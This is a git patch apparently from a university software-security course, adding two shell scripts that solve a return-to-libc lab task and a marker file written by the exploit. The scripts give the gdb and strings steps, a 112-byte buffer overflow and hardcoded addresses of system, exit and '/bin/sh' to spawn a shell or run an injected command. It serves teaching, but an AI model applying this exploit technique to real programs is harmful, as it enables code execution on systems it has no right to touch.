From 55f05052967612c67626300f11ea0f23d75d285d Mon Sep 17 00:00:00 2001 From: Sascha Tommasone Date: Fri, 14 Jun 2024 16:01:04 +0200 Subject: [PATCH] [Assignment-6] solution task 8 (return-to-libc) --- .../ret2libc/solution.sh | 31 +++++++++++++++++++ .../ret2libc/solution_grade.sh | 29 +++++++++++++++++ .../ret2libc/t0p_s3cr3t/owned | 1 + 3 files changed, 61 insertions(+) create mode 100755 Assignment 6 - Software Security - Teil 2/ret2libc/solution.sh create mode 100755 Assignment 6 - Software Security - Teil 2/ret2libc/solution_grade.sh create mode 100644 Assignment 6 - Software Security - Teil 2/ret2libc/t0p_s3cr3t/owned diff --git a/Assignment 6 - Software Security - Teil 2/ret2libc/solution.sh b/Assignment 6 - Software Security - Teil 2/ret2libc/solution.sh new file mode 100755 index 0000000..de29aca --- /dev/null +++ b/Assignment 6 - Software Security - Teil 2/ret2libc/solution.sh @@ -0,0 +1,31 @@ +#!/bin/bash + +# sources: https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/return-to-libc-ret2libc + +##### Exploit Creation Steps ##### +################################### + +# Step 1: Locate the offset of the string '/bin/sh' in libc +# Command: strings -a -t x /usr/lib32/libc-2.31.so | grep /bin/sh +# ---> 0x18c363 + +# Step 2: Determine the base address of libc in the ret2libc environment using gdb +# Command: info proc map +# ---> 0xf7dd4000 + +# Step 3: Find the addresses of 'system' and 'exit' functions using gdb +# Commands: +# p system -> 0xf7e15360 +# p exit -> 0xf7e07ec0 +################################### + +############ Exploit ############## +# Fill the buffer with 'A's until the stored EIP is reached +printf "A%.0s" {1..112} + +# Overwrite the stored EIP with the address of 'system' function +# Place the address of 'exit' function as the return address for 'system' +# Provide the argument for 'system' which is the address of the string '/bin/sh' (calculated as base libc + offset) +# All addresses are in little-endian format +printf "\x60\x53\xe1\xf7\xc0\x7e\xe0\xf7\x63\x03\xf6\xf7" +################################### diff --git a/Assignment 6 - Software Security - Teil 2/ret2libc/solution_grade.sh b/Assignment 6 - Software Security - Teil 2/ret2libc/solution_grade.sh new file mode 100755 index 0000000..42badf4 --- /dev/null +++ b/Assignment 6 - Software Security - Teil 2/ret2libc/solution_grade.sh @@ -0,0 +1,29 @@ +#!/bin/bash + +##### Exploit Creation Steps ##### +################################### + +# Step 1: Find the addresses of 'system' and 'exit' functions using gdb +# Commands: +# p system -> 0xf7e15360 +# p exit -> 0xf7e07ec0 + +# Step 2: Export an environment variable to inject our command as a string into the ret2libc executable +# Command: export COMMAND="echo 100 > /home/user/t0p_s3cr3t/owned" + +# Step 3: Find the address of the environment variable string in memory using gdb +# Command: x/s *((char **)environ+16) (17th env. variable) +# Add 8 to the address to skip the 'COMMAND=' part +# -> 0xffffdeda (0xffffdee8 in gdb; different env. vars when executing ./ret2libc directly; found by trial and error) +################################### + +############ Exploit ############## +# Fill the buffer with 'A's until the stored EIP is reached +printf "A%.0s" {1..112} + +# Overwrite the stored EIP with the address of the 'system' function +# Place the address of the 'exit' function as the return address for 'system' +# Provide the argument for 'system', which is the address of the value of the environment variable COMMAND +# All addresses are in little-endian format +printf "\x60\x53\xe1\xf7\xc0\x7e\xe0\xf7\xda\xde\xff\xff" +################################### diff --git a/Assignment 6 - Software Security - Teil 2/ret2libc/t0p_s3cr3t/owned b/Assignment 6 - Software Security - Teil 2/ret2libc/t0p_s3cr3t/owned new file mode 100644 index 0000000..29d6383 --- /dev/null +++ b/Assignment 6 - Software Security - Teil 2/ret2libc/t0p_s3cr3t/owned @@ -0,0 +1 @@ +100